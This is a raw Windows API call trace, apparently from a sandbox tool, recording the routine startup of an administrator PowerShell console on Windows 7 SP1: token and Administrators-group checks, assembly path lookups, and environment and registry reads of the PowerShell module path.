	[0957.844] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13
	[0957.845] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0xcddb0 | out: lpConsoleScreenBufferInfo=0xcddb0) returned 1
	[0957.846] GetVersionExW (in: lpVersionInformation=0xcdd40*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xcdd40*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0957.849] GetCurrentProcess () returned 0xffffffffffffffff
	[0957.849] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xcddd8 | out: TokenHandle=0xcddd8*=0x2d8) returned 1
	[0957.853] GetTokenInformation (in: TokenHandle=0x2d8, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xcdcf8 | out: TokenInformation=0x0, ReturnLength=0xcdcf8) returned 0
	[0957.853] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x157300
	[0957.854] GetTokenInformation (in: TokenHandle=0x2d8, TokenInformationClass=0x8, TokenInformation=0x157300, TokenInformationLength=0x4, ReturnLength=0xcdcf8 | out: TokenInformation=0x157300, ReturnLength=0xcdcf8) returned 1
	[0957.854] DuplicateTokenEx (in: hExistingToken=0x2d8, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0xcde58 | out: phNewToken=0xcde58*=0x200) returned 1
	[0957.854] GetTokenInformation (in: TokenHandle=0x2d8, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xcdcf8 | out: TokenInformation=0x0, ReturnLength=0xcdcf8) returned 0
	[0957.854] GetTokenInformation (in: TokenHandle=0x2d8, TokenInformationClass=0x8, TokenInformation=0x157330, TokenInformationLength=0x4, ReturnLength=0xcdcf8 | out: TokenInformation=0x157330, ReturnLength=0xcdcf8) returned 1
	[0957.854] CheckTokenMembership (in: TokenHandle=0x200, SidToCheck=0x2d2bc28*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0xcde68 | out: IsMember=0xcde68) returned 1
	[0957.854] CloseHandle (hObject=0x200) returned 1
	[0957.868] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0957.869] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0957.869] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0957.872] CoTaskMemAlloc (cb=0x804) returned 0x1b92a7c0
	[0957.872] GetConsoleTitleW (in: lpConsoleTitle=0x1b92a7c0, nSize=0x400 | out: lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x48
	[0958.422] CoTaskMemFree (pv=0x1b92a7c0) 
	[0961.178] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0961.178] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0961.178] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0961.179] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0961.206] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0961.206] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0961.603] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0961.604] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0961.604] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0961.604] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0961.608] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0961.608] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd8d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0961.608] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd8d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0961.608] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd8d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0961.636] SetConsoleCtrlHandler (HandlerRoutine=0x2a5689c, Add=1) returned 1
	[0963.506] CoTaskMemAlloc (cb=0x104) returned 0x207270
	[0963.506] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x207270, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0963.506] CoTaskMemFree (pv=0x207270) 
	[0963.518] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x2d0
	[0963.520] CoCreateGuid (in: pguid=0xcdf50 | out: pguid=0xcdf50*(Data1=0x838dd470, Data2=0x1cea, Data3=0x41b0, Data4=([0]=0x8e, [1]=0x80, [2]=0x78, [3]=0x49, [4]=0x3c, [5]=0x55, [6]=0xe9, [7]=0x7e))) returned 0x0
	[0963.522] CoTaskMemAlloc (cb=0x104) returned 0x207160
	[0963.522] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x207160, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0963.522] CoTaskMemFree (pv=0x207160) 
	[0966.252] WinSqmIsOptedIn () returned 0x0
	[0966.253] CoTaskMemAlloc (cb=0x104) returned 0x207160
	[0966.253] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x207160, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0966.253] CoTaskMemFree (pv=0x207160) 
	[0966.258] CoTaskMemAlloc (cb=0x104) returned 0x207160
	[0966.258] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x207160, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0966.258] CoTaskMemFree (pv=0x207160) 
	[0967.063] CoTaskMemAlloc (cb=0x104) returned 0x207160
	[0967.063] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x207160, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0967.063] CoTaskMemFree (pv=0x207160) 
	[0967.064] CoTaskMemAlloc (cb=0x104) returned 0x207160
	[0967.064] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x207160, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0967.064] CoTaskMemFree (pv=0x207160) 
	[0967.064] CoTaskMemAlloc (cb=0x104) returned 0x207160
	[0967.065] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x207160, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0967.065] CoTaskMemFree (pv=0x207160) 
	[0968.484] CoTaskMemAlloc (cb=0x104) returned 0x207160
	[0968.484] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x207160, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0968.484] CoTaskMemFree (pv=0x207160) 
	[0968.485] CoTaskMemAlloc (cb=0x104) returned 0x207160
	[0968.485] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x207160, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0968.485] CoTaskMemFree (pv=0x207160) 
	[0968.485] CoTaskMemAlloc (cb=0x104) returned 0x207160
	[0968.485] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x207160, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0968.485] CoTaskMemFree (pv=0x207160) 
	[0968.487] CoTaskMemAlloc (cb=0x104) returned 0x207160
	[0968.487] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x207160, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0968.487] CoTaskMemFree (pv=0x207160) 
	[0969.873] CoTaskMemAlloc (cb=0x104) returned 0x207160
	[0969.873] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x207160, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0969.873] CoTaskMemFree (pv=0x207160) 
	[0969.876] CoTaskMemAlloc (cb=0x104) returned 0x207160
	[0969.876] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x207160, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0969.876] CoTaskMemFree (pv=0x207160) 
	[0969.877] CoTaskMemAlloc (cb=0x104) returned 0x207160
	[0969.877] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x207160, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0969.877] CoTaskMemFree (pv=0x207160) 
	[0981.343] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0981.343] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0981.343] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0981.343] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0981.343] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0981.344] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0981.344] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0981.344] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0981.344] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0981.344] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0981.345] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0981.345] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0982.073] CoTaskMemAlloc (cb=0x104) returned 0x207160
	[0982.073] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x207160, nSize=0x80 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x75
	[0982.073] CoTaskMemFree (pv=0x207160) 
	[0983.542] CoTaskMemAlloc (cb=0xcc) returned 0x1b93a7f0
	[0983.542] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b93a7f0, nSize=0x64 | out: lpDst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerS") returned 0x76
	[0983.542] CoTaskMemFree (pv=0x1b93a7f0) 
	[0983.542] CoTaskMemAlloc (cb=0xf0) returned 0x2024c0
	[0983.543] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x2024c0, nSize=0x76 | out: lpDst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x76
	[0983.543] CoTaskMemFree (pv=0x2024c0) 
	[0983.543] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0xcdac8 | out: phkResult=0xcdac8*=0x160) returned 0x0
	[0983.543] RegQueryValueExW (in: hKey=0x160, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0xcda4c, lpData=0x0, lpcbData=0xcda48*=0x0 | out: lpType=0xcda4c*=0x2, lpData=0x0, lpcbData=0xcda48*=0x6c) returned 0x0
	[0983.543] CoTaskMemAlloc (cb=0x70) returned 0x1941e0
	[0983.543] RegQueryValueExW (in: hKey=0x160, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0xcda1c, lpData=0x1941e0, lpcbData=0xcda18*=0x6c | out: lpType=0xcda1c*=0x2, lpData="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpcbData=0xcda18*=0x6c) returned 0x0
	[0983.543] CoTaskMemFree (pv=0x1941e0) 
	[0983.544] CoTaskMemAlloc (cb=0xcc) returned 0x1b93a7f0
	[0983.544] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0x1b93a7f0, nSize=0x64 | out: lpDst="C:\\Windows") returned 0xb
	[0983.544] CoTaskMemFree (pv=0x1b93a7f0) 
	[0983.544] CoTaskMemAlloc (cb=0xcc) returned 0x1b93a7f0
	[0983.544] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b93a7f0, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0983.544] CoTaskMemFree (pv=0x1b93a7f0) 
	[0983.549] RegCloseKey (hKey=0x160) returned 0x0
	[0983.549] CoTaskMemAlloc (cb=0xcc) returned 0x1b93a7f0
	[0983.549] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b93a7f0, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0983.549] CoTaskMemFree (pv=0x1b93a7f0) 
	[0983.549] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0xcdac8 | out: phkResult=0xcdac8*=0x160) returned 0x0
	[0983.549] RegQueryValueExW (in: hKey=0x160, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0xcda4c, lpData=0x0, lpcbData=0xcda48*=0x0 | out: lpType=0xcda4c*=0x0, lpData=0x0, lpcbData=0xcda48*=0x0) returned 0x2
	[0983.549] RegCloseKey (hKey=0x160) returned 0x0
	[0983.561] CoTaskMemAlloc (cb=0x104) returned 0x207160
	[0983.561] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x207160, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0983.561] CoTaskMemFree (pv=0x207160) 
	[0983.563] CoTaskMemAlloc (cb=0x104) returned 0x207160
	[0983.564] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x207160, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0983.564] CoTaskMemFree (pv=0x207160) 
	[0983.568] CoTaskMemAlloc (cb=0x104) returned 0x207160
	[0983.568] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x207160, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0983.568] CoTaskMemFree (pv=0x207160) 
	[0983.568] CoTaskMemAlloc (cb=0x104) returned 0x207160
	[0983.569] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x207160, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0983.569] CoTaskMemFree (pv=0x207160) 
	[0983.570] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd8b8 | out: phkResult=0xcd8b8*=0x160) returned 0x0
	[0983.571] RegQueryValueExW (in: hKey=0x160, lpValueName="path", lpReserved=0x0, lpType=0xcd8cc, lpData=0x0, lpcbData=0xcd8c8*=0x0 | out: lpType=0xcd8cc*=0x1, lpData=0x0, lpcbData=0xcd8c8*=0x74) returned 0x0
	[0983.572] RegQueryValueExW (in: hKey=0x160, lpValueName="path", lpReserved=0x0, lpType=0xcd83c, lpData=0x0, lpcbData=0xcd838*=0x0 | out: lpType=0xcd83c*=0x1, lpData=0x0, lpcbData=0xcd838*=0x74) returned 0x0
	[0983.572] CoTaskMemAlloc (cb=0x78) returned 0x1941e0
	[0983.572] RegQueryValueExW (in: hKey=0x160, lpValueName="path", lpReserved=0x0, lpType=0xcd80c, lpData=0x1941e0, lpcbData=0xcd808*=0x74 | out: lpType=0xcd80c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0xcd808*=0x74) returned 0x0
	[0983.572] CoTaskMemFree (pv=0x1941e0) 
	[0983.572] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0xcd580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0983.575] SetErrorMode (uMode=0x1) returned 0x1
	[0983.575] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0xcd790 | out: lpFileInformation=0xcd790*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0983.576] SetErrorMode (uMode=0x1) returned 0x1
